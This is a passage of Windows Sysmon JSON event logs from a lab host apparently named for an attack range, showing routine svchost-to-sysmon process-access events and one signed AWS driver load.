07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1541,"ProcessID":2804,"ThreadID":3364,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:03.253\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xeniface.sys\r\nHashes: MD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9A\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 07:53:03.253","ImageLoaded":"C:\\Windows\\System32\\drivers\\xeniface.sys","Hashes":"MD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9A","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 